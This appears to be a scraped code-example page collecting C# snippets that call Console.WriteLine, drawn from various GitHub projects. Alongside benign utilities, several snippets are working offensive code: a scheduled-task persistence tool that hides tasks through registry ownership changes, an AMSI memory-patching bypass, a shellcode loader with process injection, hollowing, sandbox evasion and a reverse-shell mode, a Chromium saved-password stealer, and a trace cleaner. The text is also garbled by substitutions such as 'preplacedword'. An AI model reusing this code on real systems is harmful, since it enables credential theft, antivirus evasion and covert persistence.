Here are the examples of the csharp api System.Console.WriteLine(string) taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.
40425 Examples
19
Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5
with GNU General Public License v3.0
from 0x2b00b1e5
static void Main(string[] args)
{
Console.WriteLine("Running...");
try
{
FL_RPC.Init();
}
catch (Exception e)
{
Console.WriteLine("\n \nERROR: " + e.Message);
Console.WriteLine("INFO: Exception Name: " + e.GetType());
Console.WriteLine("\n");
FL_RPC.StopAndExit();
Environment.Exit(-1);
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5
with GNU General Public License v3.0
from 0x2b00b1e5
static void Main(string[] args)
{
try
{
PrintIntro();
GetInfo();
GetFLPaths();
bool go = Review();
if (go)
{
Execute();
System.Threading.Thread.Sleep(2000);
Environment.Exit(0);
}
if (!go)
{
Console.WriteLine("\nOperation cancelled");
System.Threading.Thread.Sleep(2000);
Environment.Exit(-1);
}
}
catch(Exception e)
{
Console.WriteLine(string.Format("ERR: {0}", e.Message));
Environment.Exit(-1);
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5
with GNU General Public License v3.0
from 0x2b00b1e5
static void PrintIntro()
{
Console.WriteLine("This program will create a shortcut that will launch both FL Studio and FL-RPC for Discord");
Console.WriteLine("Written by HugoPilot (C0der) - Licensed under GNU GPL v3");
Console.WriteLine("Check out my other projects at https://github.com/hugopilot!");
Console.WriteLine("------------------------------------------------------------------------------------------");
Console.WriteLine("\n");
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5
with GNU General Public License v3.0
from 0x2b00b1e5
static void GetInfo()
{
Console.WriteLine("Would you like to replace your current shortcuts on your desktop? (Y/N)");
switch (Console.ReadKey().Key)
{
case ConsoleKey.Y:
ReplaceDesktop = true;
break;
case ConsoleKey.N:
ReplaceDesktop = false;
break;
default:
ReplaceDesktop = false;
break;
}
Console.WriteLine("\n Leave blank if you don't want to add shortcuts");
Console.Write("\n Where would you like to write (additonal) shortcuts? Write the full path to the folder, seperate folder paths with a comma (,): ");
string feed = Console.ReadLine();
if (feed != null)
{
WriteShortcuts = feed.Split(',');
}
Console.Write("\n Enter the version number of FL Studio (e.g 20): ");
VersionNumber = Console.ReadLine();
Console.WriteLine("Thank you! \n \n");
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5
with GNU General Public License v3.0
from 0x2b00b1e5
static void GetFLPaths()
{
string path = (string)Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Image-Line\\Shared\\Paths", "FL Studio", null);
if(path == null)
{
Console.WriteLine("No FL Studio path detected!\n\n");
Console.Write("Please enter full path to the FL Studio executable: ");
string output = Console.ReadLine();
System.Diagnostics.FileVersionInfo FLInf = System.Diagnostics.FileVersionInfo.GetVersionInfo(output);
if (FLInf.ProductName != "FL Studio")
{
Console.WriteLine("\n This file doesn't appear to be a FL Studio executable...try again!");
GetFLPaths();
}
FLStudioPaths = output;
}
else
{
FLStudioPaths = path;
Console.WriteLine(string.Format("Found FL Studio at path: {0}", path));
Console.WriteLine("Correct? (Y/N)");
switch (Console.ReadKey().Key)
{
case ConsoleKey.Y:
break;
case ConsoleKey.N:
Console.Write("Please enter full path to the FL Studio executable: ");
string output = Console.ReadLine();
output.Replace("\"", string.Empty);
System.Diagnostics.FileVersionInfo FLInf = System.Diagnostics.FileVersionInfo.GetVersionInfo(output);
if (FLInf.ProductName != "FL Studio")
{
Console.WriteLine("\n This file doesn't appear to be a FL Studio executable...try again!");
System.Threading.Thread.Sleep(1000);
GetFLPaths();
}
FLStudioPaths = output;
break;
}
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5
with GNU General Public License v3.0
from 0x2b00b1e5
static bool Review()
{
Console.WriteLine("\n Please review these settings: \n");
Console.WriteLine("-------------------------------------------------------------------------------");
Console.WriteLine("Shortcuts:");
Console.WriteLine(string.Format(" Replace desktop shortcuts: {0} \n", ReplaceDesktop.ToString()));
if (WriteShortcuts[0] == "")
{
Console.WriteLine(string.Format(" Don't write additional shortcuts"));
}
else
{
Console.WriteLine(string.Format(" Write additional shortcuts to: \n"));
foreach(string p in WriteShortcuts)
{
Console.WriteLine(string.Format(" {0}", p));
}
Console.WriteLine();
}
Console.WriteLine("-------------------------------------------------------------------------------");
Console.WriteLine("FL Studio versions:\n");
Console.WriteLine(string.Format(" Path: {0}", FLStudioPaths));
if(VersionNumber == ""){ Console.WriteLine(" No version specified\n"); }
else
{ Console.WriteLine(string.Format(" Version: {0}\n", VersionNumber)); }
Console.WriteLine("-------------------------------------------------------------------------------\n");
Console.WriteLine("Are these settings OK? (Y/N)");
switch (Console.ReadKey().Key)
{
case ConsoleKey.Y:
return true;
case ConsoleKey.N:
return false;
}
return false;
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5
with GNU General Public License v3.0
from 0x2b00b1e5
static void Execute()
{
string batchpath = Path.Combine(FolderExe, "SHORTCUT.bat");
CreateBatch(FLStudioPaths, batchpath);
if (ReplaceDesktop)
{
CreateShortcut(string.Format("FL Studio {0}", VersionNumber), Environment.GetFolderPath(Environment.SpecialFolder.Desktop), batchpath, IconPath());
CreateShortcut(string.Format("FL Studio {0}", VersionNumber), Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Programs), "Image-Line"), batchpath, IconPath());
CreateShortcut(string.Format("FL Studio {0}", VersionNumber), Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Microsoft\\Windows\\Start Menu\\Programs\\Image-Line"), batchpath, IconPath());
}
if (WriteShortcuts[0] != "")
{
foreach (string p in WriteShortcuts)
{
string realP = p.Replace(@"""", string.Empty);
CreateShortcut(string.Format("FL Studio {0}", VersionNumber), realP , batchpath, IconPath());
}
}
Console.WriteLine("\n\n Done, Thank you!");
}
19
Source : Program.cs
with MIT License
from 0x727
with MIT License
from 0x727
static void Main(string[] args)
{
//if (args.Length == 1)
//{
// string taskname = args[0];
// DeleteTask(taskname);
// return;
//}
if (args.Length != 2)
{
Banner();
Console.WriteLine("\nUsage: SchTask.exe <File Path> <Minutes>");
Console.WriteLine(@" Eg: SchTask.exe C:\Windows\System32\cmd.exe 10");
//Console.WriteLine("\nUsage: SchTask.exe <TaskName>");
//Console.WriteLine("[!] Add the scheduled task first and then delete it");
}
else
{
Banner();
string inputfile = args[0];
string min = args[1];
//选择主机随机进程名
Process[] progresses = Process.GetProcesses();
Random random = new Random();
string randomname = (progresses[random.Next(progresses.Length)].ProcessName);
if (File.Exists(inputfile))
{
Copy(inputfile, randomname, min);
return;
}
Console.WriteLine("\n[x] Local file not found !");
}
}
19
Source : Program.cs
with MIT License
from 0x727
with MIT License
from 0x727
public static void Banner()
{
Console.WriteLine(@" ___ _____ ____ _____");
Console.WriteLine(@" / _ \__ _|___ |___ \___ |");
Console.WriteLine(@"| | | \ \/ / / / __)| / /");
Console.WriteLine(@"| |_| |> < / / / __/ / / https://github.com/0x727");
Console.WriteLine(@" \___//_/\_\/_/ |_____/_/ Author: AnonySec");
}
19
Source : Program.cs
with MIT License
from 0x727
with MIT License
from 0x727
public static void Copy(string inputfile, string randomname, string min)
{
string appdataFile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
string sourceFile = $@"{inputfile}";
//获取拓展名
string extension = Path.GetExtension(sourceFile);
string destinationFile = appdataFile + $@"\Microsoft\Windows\Themes\{randomname}" + extension;
if (File.Exists(destinationFile))
{
Console.WriteLine($"\n[x] File name exists: {destinationFile}");
return;
}
else
{
File.Copy(sourceFile, destinationFile);
//File.Move(sourceFile, destinationFile);
Console.WriteLine($"\n[*] Copy File location: \n{destinationFile}");
CreateTask(randomname, destinationFile, min);
}
}
19
Source : Program.cs
with MIT License
from 0x727
with MIT License
from 0x727
public static void HidXml(string taskpath)
{
string xml = $@"C:\Windows\System32\Tasks" + taskpath;
FileInfo info = new FileInfo(xml);
if (info.Exists)
{
info.Attributes = FileAttributes.Hidden;
Console.WriteLine($"[*] Hidden task xml file: \n{xml}");
}
}
19
Source : Program.cs
with MIT License
from 0x1000000
with MIT License
from 0x1000000
private static void Print(IReadOnlyList<NodeModel> buffer)
{
foreach (var nodeModel in buffer)
{
Console.WriteLine(nodeModel.TypeName);
foreach (var sn in nodeModel.SubNodes)
{
Console.WriteLine($" - {sn.PropertyName}: {sn.PropertyType}{(sn.IsList ? "[]" : "")}");
}
foreach (var sn in nodeModel.Properties)
{
Console.WriteLine($" * {sn.PropertyName}: {sn.PropertyType}");
}
}
}
19
Source : Program.cs
with MIT License
from 0x1000000
with MIT License
from 0x1000000
private static async Task Step12Merge(ISqDatabase database, bool output)
{
var data = new[]
{
new { FirstName = "Francois", LastName = "Sturman2" },
new { FirstName = "Allina", LastName = "Freeborne2" },
new { FirstName = "Maye", LastName = "Malloy" },
};
var action = CustomColumnFactory.String("Actions");
var inserted = CustomColumnFactory.NullableInt32("Inserted");
var deleted = CustomColumnFactory.NullableInt32("Deleted");
var tableUser = new TableUser();
if (output)
{
await MergeDataInto(tableUser, data)
.MapDataKeys(s => s
.Set(s.Target.FirstName, s.Source.FirstName))
.MapData(s => s
.Set(s.Target.LastName, s.Source.LastName))
.WhenMatchedThenUpdate()
.AlsoSet(s => s
.Set(s.Target.Version, s.Target.Version + 1)
.Set(s.Target.ModifiedAt, GetUtcDate()))
.WhenNotMatchedByTargetThenInsert()
.AlsoInsert(s => s
.Set(s.Target.Version, 1)
.Set(s.Target.ModifiedAt, GetUtcDate()))
.Output((t, s, m) => m.Inserted(t.UserId.As(inserted)).Deleted(t.UserId.As(deleted)).Action(action))
.Done()
.Query(database,
r => Console.WriteLine(
$"UserId Inserted: {inserted.Read(r)},UserId Deleted: {deleted.Read(r)} , Action: {action.Read(r)}"));
}
else
{
//PG and My SQL do not support MERGE natively
await MergeDataInto(tableUser, data)
.MapDataKeys(s => s
.Set(s.Target.FirstName, s.Source.FirstName))
.MapData(s => s
.Set(s.Target.LastName, s.Source.LastName))
.WhenMatchedThenUpdate()
.AlsoSet(s => s
.Set(s.Target.Version, s.Target.Version + 1)
.Set(s.Target.ModifiedAt, GetUtcDate()))
.WhenNotMatchedByTargetThenInsert()
.AlsoInsert(s => s
.Set(s.Target.Version, 1)
.Set(s.Target.ModifiedAt, GetUtcDate()))
.Done()
.Exec(database);
}
}
19
Source : Program.cs
with MIT License
from 0x1000000
with MIT License
from 0x1000000
private static async Task Step18ExportToJson(ISqDatabase database)
{
var tableUser = new TableUser(Alias.Empty);
var selectExpr = Select(tableUser.FirstName, tableUser.LastName)
.From(tableUser)
.Where(tableUser.LastName == "Sturman")
.Done();
//Exporting
var memoryStream = new MemoryStream();
var jsonWriter = new Utf8JsonWriter(memoryStream);
selectExpr.SyntaxTree().ExportToJson(jsonWriter);
string json = Encoding.UTF8.GetString(memoryStream.ToArray());
Console.WriteLine(json);
//Importing
var restored = (ExprQuerySpecification)ExprDeserializer
.DeserializeFormJson(JsonDoreplacedent.Parse(json).RootElement);
var result = await restored
.QueryList(database, r => (tableUser.FirstName.Read(r), tableUser.LastName.Read(r)));
foreach (var name in result)
{
Console.WriteLine(name);
}
}
19
Source : ModelClassGeneratorTest.cs
with MIT License
from 0x1000000
with MIT License
from 0x1000000
[Test]
public void BasicTest()
{
TestFileSystem fileSystem = new TestFileSystem();
fileSystem.AddFile("A\\table1.cs", TestTable1Text);
var generated = ExistingCodeExplorer
.EnumerateTableDescriptorsModelAttributes("A", fileSystem)
.ParseAttribute(true)
.Createreplacedysis()
.Select(meta=> ModelClreplacedGenerator.Generate(meta, "Org", "", true, fileSystem, out _).SyntaxTree)
.ToList();
var trees = new List<SyntaxTree>();
foreach (var syntaxTree in generated)
{
trees.Add(CSharpSyntaxTree.ParseText(syntaxTree.ToString()));
}
trees.Add(CSharpSyntaxTree.ParseText(TestTable1Text));
var compilation = CSharpCompilation.Create("SqModels",
trees,
options: new CSharpCompilationOptions(OutputKind.DynamicallyLinkedLibrary, nullableContextOptions: NullableContextOptions.Enable));
compilation = compilation.AddReferences(
MetadataReference.CreateFromFile(replacedembly.Load("netstandard, Version=2.0.0.0").Location),
MetadataReference.CreateFromFile(typeof(object).replacedembly.GetreplacedemblyLocation()),
MetadataReference.CreateFromFile(replacedembly
.Load("System.Runtime, Version=4.2.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")
.Location),
MetadataReference.CreateFromFile(typeof(SqQueryBuilder).replacedembly.GetreplacedemblyLocation()));
MemoryStream ms = new MemoryStream();
var emitResult = compilation.Emit(ms);
if (!emitResult.Success)
{
Diagnostic first = emitResult.Diagnostics.First();
var sourceCode = first.Location.SourceTree?.ToString();
var s = sourceCode?.Substring(first.Location.SourceSpan.Start, first.Location.SourceSpan.Length);
Console.WriteLine(sourceCode);
replacedert.Fail(first.GetMessage()+ (string.IsNullOrEmpty(s)?null:$" \"{s}\""));
}
var replacedembly = replacedembly.Load(ms.ToArray());
var allTypes = replacedembly.GetTypes();
replacedert.AreEqual(21, allTypes.Length);
}
19
Source : FLRPC.cs
with GNU General Public License v3.0
from 0x2b00b1e5
with GNU General Public License v3.0
from 0x2b00b1e5
private static void OnPresenceUpdate(object sender, PresenceMessage args)
{
//This is called when the Rich Presence has been updated in the discord client.
// Use this to keep track of the rich presence and validate that it has been sent correctly.
Console.WriteLine("Changes detected, Presence updated");
}
19
Source : Program.cs
with MIT License
from 0x727
with MIT License
from 0x727
public static void RegistryKeyRule(string randomname)
{
string regpath = @"Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UPnP\" + randomname;
try
{
//授予Restore、Backup、TakeOwnership特权
TokenManipulator.AddPrivilege("SeRestorePrivilege");
TokenManipulator.AddPrivilege("SeBackupPrivilege");
TokenManipulator.AddPrivilege("SeTakeOwnershipPrivilege");
//更改注册表项值的所有者
RegistryKey subKey = Registry.LocalMachine.OpenSubKey(regpath, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.TakeOwnership);
RegistrySecurity rs = new RegistrySecurity();
//设置安全性的所有者为Administrators
rs.SetOwner(new NTAccount("Administrators"));
//为注册表项设置权限
subKey.SetAccessControl(rs);
//更改注册表项值的权限
RegistryAccessRule rar = new RegistryAccessRule("Administrators", RegistryRights.FullControl, AccessControlType.Allow);
rs.AddAccessRule(rar);
subKey.SetAccessControl(rs);
subKey.Close();
RegistryKey rk = Registry.LocalMachine.OpenSubKey(regpath, true);
//设置Index值为0,隐藏计划任务,默认值为1
rk.SetValue("Index", 0, RegistryValueKind.DWord);
rk.Close();
RegeditKeyExist(regpath);
string rkl = Registry.LocalMachine + "\\" + regpath;
Console.WriteLine($"[*] RegistryKey location: \n{rkl}");
}
finally
{
//删除Restore、Backup、TakeOwnership特权
TokenManipulator.RemovePrivilege("SeRestorePrivilege");
TokenManipulator.RemovePrivilege("SeBackupPrivilege");
TokenManipulator.RemovePrivilege("SeTakeOwnershipPrivilege");
Console.WriteLine("\n[+] Successfully add scheduled task !");
}
}
19
Source : Program.cs
with MIT License
from 0x727
with MIT License
from 0x727
public static void DeleteTask(string taskname)
{
//不要写成 "\Microsoft\Windows\UPnP\" — 报错 — 找不到
string taskpath = @"\Microsoft\Windows\UPnP";
//获得计划任务
TaskService ts = new TaskService();
TaskCollection tc = ts.GetFolder(taskpath).GetTasks();
//Console.WriteLine($"{tc}");
if (tc.Exists(taskname))
{
string dtask = taskpath + "\\" + taskname;
ts.RootFolder.DeleteTask(dtask);
Console.WriteLine("\n[+] Successfully delete scheduled task !");
}
else
{
Console.WriteLine("\n[!] Please add scheduled task !");
}
}
19
Source : Class1.cs
with GNU General Public License v3.0
from 0xB455
with GNU General Public License v3.0
from 0xB455
public static int Patch()
{
//Get pointer for the amsi.dll
IntPtr TargetDLL = LoadLibrary("amsi.dll");
if (TargetDLL == IntPtr.Zero)
{
Console.WriteLine("ERROR: Could not retrieve amsi.dll pointer!");
return 1;
}
//Get pointer for the AmsiScanBuffer function
IntPtr AmsiScanBufrPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer");
if (AmsiScanBufrPtr == IntPtr.Zero)
{
Console.WriteLine("ERROR: Could not retrieve AmsiScanBuffer function pointer!");
return 1;
}
/*
* Apply memory patching as described by Cyberark here:
* https://www.cyberark.com/threat-research-blog/amsi-bypreplaced-redux/
*/
UIntPtr dwSize = (UIntPtr)4;
uint Zero = 0;
//Pointer changing the AmsiScanBuffer memory protection from readable only to writeable (0x40)
if (!VirtualProtect(AmsiScanBufPtr, dwSize, 0x40, out Zero))
{
Console.WriteLine("ERROR: Could not modify AmsiScanBuffer memory permissions!");
return 1;
}
Byte[] Patch = { 0x31, 0xff, 0x90 }; //The new patch opcode
//Setting a pointer to the patch opcode array (unmanagedPointer)
IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
Marshal.Copy(Patch, 0, unmanagedPointer, 3);
//Patching the relevant line (the line which submits the rd8 to the edi register) with the xor edi,edi opcode
MoveMemory(AmsiScanBufrPtr + 0x001b, unmanagedPointer, 3);
Console.WriteLine("Great success. AmsiScanBuffer patched! :)");
return 0;
}
19
Source : Program.cs
with MIT License
from 0xDivyanshu
with MIT License
from 0xDivyanshu
static int process_injection(string location, int button, int encryption, string preplacedword)
{
Process[] remote_p = Process.GetProcessesByName("notepad");
Process current_p = Process.GetCurrentProcess();
int pid = 0;
if (remote_p.Length == 0)
{
//Create Process
Process p = new Process();
p.StartInfo.FileName = "C:\\Windows\\System32\\notepad.exe";
p.StartInfo.WindowStyle = ProcessWindowStyle.Maximized;
p.Start();
pid = p.Id;
}
else
{
pid = remote_p[0].Id;
}
byte[] shellcode = downloaded_data(location, encryption, preplacedword);
//Initializations
bool res = false;
IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
IntPtr address = IntPtr.Zero;
if (Flags.advanced_bypreplaced == 0)
{
address = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
IntPtr bytes = IntPtr.Zero;
res = WriteProcessMemory(hProcess, address, shellcode, shellcode.Length, out bytes);
if (res == false)
{
Console.WriteLine("Cannot copy into process");
return -1;
}
IntPtr thread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, address, IntPtr.Zero, 0, IntPtr.Zero);
return 0;
}
else
{
IntPtr Section_handle = IntPtr.Zero;
uint size = (uint)shellcode.Length;
if (NtCreateSection(ref Section_handle, SECTION_ALL_ACCESS, IntPtr.Zero, ref size, 0x40, SEC_COMMIT, IntPtr.Zero) != 0)
{
Console.WriteLine("[!] Cannot create section");
return -1;
}
IntPtr local_addr = IntPtr.Zero;
IntPtr remote_addr = IntPtr.Zero;
ulong offsec = 0;
if (NtMapViewOfSection(Section_handle, current_p.Handle, ref local_addr, UIntPtr.Zero, UIntPtr.Zero, out offsec, out size, 2, 0, EXECUTE_READ_WRITE) != 0)
{
Console.WriteLine("[!] Cannot map the section into remote process");
return -1;
}
if (NtMapViewOfSection(Section_handle, hProcess, ref remote_addr, UIntPtr.Zero, UIntPtr.Zero, out offsec, out size, 2, 0, EXECUTE_READ_WRITE) != 0)
{
Console.WriteLine("Cannot map the section into local process");
return -1;
}
Marshal.Copy(shellcode, 0, local_addr, shellcode.Length);
CreateRemoteThread(hProcess, IntPtr.Zero, 0, remote_addr, IntPtr.Zero, 0, IntPtr.Zero);
NtUnmapViewOfSection(current_p.Handle, local_addr);
return 0;
}
}
19
Source : Program.cs
with MIT License
from 0xDivyanshu
with MIT License
from 0xDivyanshu
static void help_xenon()
{
Console.WriteLine("Help Options for Xenon:");
Console.WriteLine("-m \t Mode of operation");
Console.WriteLine("\t-m 1 \t Specifies the mode as Process injection");
Console.WriteLine("\t-m 2 \t Specifies the mode as DLL Injection");
Console.WriteLine("\t-m 3 \t Specifies the mode as Process Hollowing");
Console.WriteLine("\t-m 4 \t No injection! Give me my damn shell\n");
Console.WriteLine("\t-m 5 \t Powershell session via CLM bypreplaced\n");
Console.WriteLine("\t-m 6 \t DLL hollowing ");
Console.WriteLine("-TempFile \t File location that your current user can read");
Console.WriteLine("-shellcode \t Use shellcode");
Console.WriteLine("-dll \t Use dll");
Console.WriteLine("-decrypt-xor \t Specify Xor decryption for shellcode");
Console.WriteLine("\t -preplaced \t Specifty the preplacedword for Xor decryption");
Console.WriteLine("-decrypt-aes \t Specify aes decryption for shellcode");
Console.WriteLine("\t -preplaced \t Specifty the preplacedword for aes decryption");
Console.WriteLine("-location \t Specify the location i.e either server or local");
Console.WriteLine("-bypreplaced \tUses enhance attempts to bypreplaced AV");
return;
}
19
Source : Program.cs
with MIT License
from 0xDivyanshu
with MIT License
from 0xDivyanshu
static int Main(string[] args)
{
//xenon.exe -m <1,2,3> --<shellcode/dll> --location <http://1.1.1.1/name, C:\\A\\B\\name> --<enc> --key <preplacedword>
//IEnumerable<string> arg = Arguments.SplitCommandLine(string.Join(" ", args));
IEnumerable<string> arg = args;
var arguments = new Arguments(arg);
if (arguments.Exists("m"))
{
int m = int.Parse(arguments.Single("m"));
if (m == 5)
{
if (arguments.Exists("TempFile"))
{
string name = arguments.Single("TempFile");
powershell_clm(name);
Console.WriteLine("Powershell session exit!");
return 0;
}
else
{
help_xenon();
return -1;
}
}
}
if ((arguments.Exists("m") && arguments.Exists("location") && (arguments.Exists("shellcode") || arguments.Exists("dll"))) == false || arguments.Count < 3)
{
help_xenon();
return -1;
}
// Sleep AV detection
DateTime t1 = DateTime.Now;
Sleep(2000);
if (DateTime.Now.Subtract(t1).TotalSeconds < 2)
{
Console.WriteLine("[!] AV Emulator detected! Behaving like a good boy :)");
return 0;
}
//Options to transfer shellcode/DLL - Via SMB share and local disk (.dll for dll and .txt for shellcode)
//1. Process injection via shellcode
//2. Reflective Process injection via DLL (in memory)
//3. Process Hollowing (shellcode)
Console.WriteLine("[+] Parsing command line arguments");
//Parsing Command line arguments
int mode = int.Parse(arguments.Single("m"));
string location = arguments.Single("location");
int button = 0;
if (arguments.Exists("shellcode"))
{
button = 1;
}
else
button = 2;
int decryption = 0;
string preplaced = "";
if (arguments.Exists("decrypt-xor"))
{
decryption = 1;
preplaced = arguments.Single("preplaced");
preplaced = CreateMD5(preplaced);
}
else if (arguments.Exists("decrypt-aes"))
{
decryption = 2;
preplaced = arguments.Single("preplaced");
preplaced = CreateMD5(preplaced);
}
if (arguments.Exists("bypreplaced"))
{
Flags.advanced_bypreplaced = 1;
}
// Dealing with command line arguments for main logic
int response = 0;
switch (mode)
{
case 1:
if (button == 1)
Console.WriteLine("Injecting into process via shellcode at " + location);
else
Console.WriteLine("Injecting into process via DLL at " + location);
response = process_injection(location, button, decryption, preplaced);
if (response == 0)
Console.WriteLine("[+] Process Injection done :)");
else
Console.WriteLine("[!] Error running the process injection module");
break;
case 2:
Console.WriteLine("DLL Injection into process using DLL at " + location);
response = reflective_dll_injection(location);
if (response == 0)
Console.WriteLine("[+] DLL Injection done :)");
else
Console.WriteLine("[!] Error running the DLL injection module");
break;
case 3:
Console.WriteLine("Using Process hollowing into process using DLL at " + location);
response = process_hollowing(location, decryption, preplaced);
if (response == 0)
Console.WriteLine("[+] Process hollowing done :)");
else
Console.WriteLine("[!] Error running the process hollowing module");
break;
case 4:
Console.WriteLine("Getting a basic reverse shell for you using shellcode at " + location);
basic_rev(location, decryption, preplaced);
Console.WriteLine("Reverse Shell done :)");
break;
case 6:
Console.WriteLine("DLL Hollowing in process! Using shellcode at " + location);
int res = dll_hollowing(location, decryption, preplaced);
if (res == 0)
Console.WriteLine("[+] DLL Hollowing done :)");
else
Console.WriteLine("[!] Error running the DLL hollowing module");
break;
default:
Console.WriteLine("Mode not found");
break;
}
return 0;
}
19
Source : Helper.cs
with MIT License
from 0xDivyanshu
with MIT License
from 0xDivyanshu
static void Main(string[] args)
{
if (args[0].StartsWith("-location") && args[1].StartsWith("-encrypt") && args[2].StartsWith("-preplacedword") && args[3].StartsWith("-saveTo"))
{
string location = args[0].Split('=')[1];
string algo = args[1].Split('=')[1];
string preplaced = args[2].Split('=')[1];
string writeTo = args[3].Split('=')[1];
preplaced = CreateMD5(preplaced);
byte[] shellcode;
if (location.StartsWith("http") || location.StartsWith("\\"))
{
WebClient wc = new WebClient();
string url = location;
shellcode = wc.DownloadData(url);
}
else
{
shellcode = File.ReadAllBytes(location);
}
if (algo == "aes")
{
byte[] encoded_shellcode = Encrypt(shellcode, preplaced,"1234567891234567");
File.WriteAllBytes(writeTo, encoded_shellcode);
Console.WriteLine("[+] Encrypted aes shellcode written to disk");
return;
}
else if (algo == "xor")
{
byte[] encoded_shellcode = xor_enc(shellcode, preplaced);
File.WriteAllBytes(writeTo, encoded_shellcode);
Console.WriteLine("[+] Encrypted xor shellcode written to disk");
return;
}
}
else
{
help_me();
return;
}
}
19
Source : Chromium.cs
with GNU General Public License v3.0
from 0xfd3
with GNU General Public License v3.0
from 0xfd3
public static string Decrypt(string encryptedData)
{
if (encryptedData == null || encryptedData.Length == 0)
return null;
try
{
return Encoding.UTF8.GetString(ProtectedData.Unprotect(Encoding.Default.GetBytes(encryptedData), null, DataProtectionScope.CurrentUser));
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
return null;
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0xfd3
with GNU General Public License v3.0
from 0xfd3
static void Main(string[] args)
{
var a = Chromium.Grab();
foreach (var b in a)
{
Console.WriteLine("Url: " + b.URL);
Console.WriteLine("Username: " + b.UserName);
Console.WriteLine("Preplacedword: " + b.Preplacedword);
Console.WriteLine("Application: " + b.Application);
Console.WriteLine("=============================");
}
Console.ReadKey();
}
19
Source : Program.cs
with MIT License
from 0xDivyanshu
with MIT License
from 0xDivyanshu
static int process_hollowing(string location, int encryption, string preplacedword)
{
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
bool res = CreateProcess(null, "C:\\Windows\\System32\\svchost.exe", IntPtr.Zero, IntPtr.Zero, false, 0x4, IntPtr.Zero, null, ref si, out pi);
if (res == false)
{
Console.WriteLine("[!] Error creating svchosts.exe");
return -1;
}
PROCESS_BASIC_INFORMATION pib = new PROCESS_BASIC_INFORMATION();
uint tmp = 0;
IntPtr hProcess = pi.hProcess;
ZwQueryInformationProcess(hProcess, 0, ref pib, (uint)(UIntPtr.Size * 6), ref tmp);
IntPtr PointerToPE = (IntPtr)((Int64)pib.PebBaseAddress + 0x10);
byte[] addrBuf = new byte[IntPtr.Size];
IntPtr nRead = IntPtr.Zero;
ReadProcessMemory(hProcess, PointerToPE, addrBuf, addrBuf.Length, out nRead);
IntPtr SvcHostBase = (IntPtr)(BitConverter.ToInt64(addrBuf, 0));
byte[] data = new byte[0x200];
ReadProcessMemory(hProcess, SvcHostBase, data, data.Length, out nRead);
uint e_lfanew_offset = BitConverter.ToUInt32(data, 0x3C);
uint opthdr = e_lfanew_offset + 0x28;
uint entrypoint_rva = BitConverter.ToUInt32(data, (int)opthdr);
IntPtr addressOfEntryPoint = (IntPtr)(entrypoint_rva + (UInt64)SvcHostBase);
// Get shellcode bytes from localtion
byte[] shellcode = downloaded_data(location, encryption, preplacedword);
WriteProcessMemory(hProcess, addressOfEntryPoint, shellcode, shellcode.Length, out nRead);
ResumeThread(pi.hThread);
return 0;
}
19
Source : Helper.cs
with MIT License
from 0xDivyanshu
with MIT License
from 0xDivyanshu
static void help_me()
{
Console.WriteLine("Helper.exe \n-location=<local_storage_of_raw_shellcode> \n-encrypt=<aes/xor> \n-preplacedword=<preplaced> \n-saveTo=<writeToFile>");
return;
}
19
Source : Chromium.cs
with GNU General Public License v3.0
from 0xfd3
with GNU General Public License v3.0
from 0xfd3
private static List<Account> Accounts(string path, string browser, string table = "logins")
{
//Get all created profiles from browser path
List<string> loginDataFiles = GetAllProfiles(path);
List<Account> data = new List<Account>();
foreach (string loginFile in loginDataFiles.ToArray())
{
if (!File.Exists(loginFile))
continue;
SQLiteHandler SQLDatabase;
try
{
SQLDatabase = new SQLiteHandler(loginFile); //Open database with Sqlite
}
catch (System.Exception ex)
{
Console.WriteLine(ex.ToString());
continue;
}
if (!SQLDatabase.ReadTable(table))
continue;
for (int I = 0; I <= SQLDatabase.GetRowCount() - 1; I++)
{
try
{
//Get values with row number and column name
string host = SQLDatabase.GetValue(I, "origin_url");
string username = SQLDatabase.GetValue(I, "username_value");
string preplacedword = SQLDatabase.GetValue(I, "preplacedword_value");
if (preplacedword != null)
{
//check v80 preplacedword signature. its starting with v10 or v11
if (preplacedword.StartsWith("v10") || preplacedword.StartsWith("v11"))
{
//Local State file located in the parent folder of profile folder.
byte[] masterKey = GetMasterKey(Directory.GetParent(loginFile).Parent.FullName);
if (masterKey == null)
continue;
preplacedword = DecryptWithKey(Encoding.Default.GetBytes(preplacedword), masterKey);
}
else
preplacedword = Decrypt(preplacedword); //Old versions using UnprotectData for decryption without any key
}
else
continue;
if (!string.IsNullOrEmpty(host) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(preplacedword))
data.Add(new Account() { URL = host, UserName = username, Preplacedword = preplacedword, Application = browser });
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
}
}
return data;
}
19
Source : Program.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
static void HowTo()
{
Console.WriteLine("CleanRunMRU");
Console.WriteLine(" Query current RunMRU key");
Console.WriteLine(" CleanRunMRU.exe query\n");
Console.WriteLine(" Clear all the values");
Console.WriteLine(" CleanRunMRU.exe clearall\n");
Console.WriteLine(" Clear one specific value");
Console.WriteLine(" CleanRunMRU.exe command=\"C:\\Windows\\System32\\cmd.exe\"\n");
}
19
Source : Program.cs
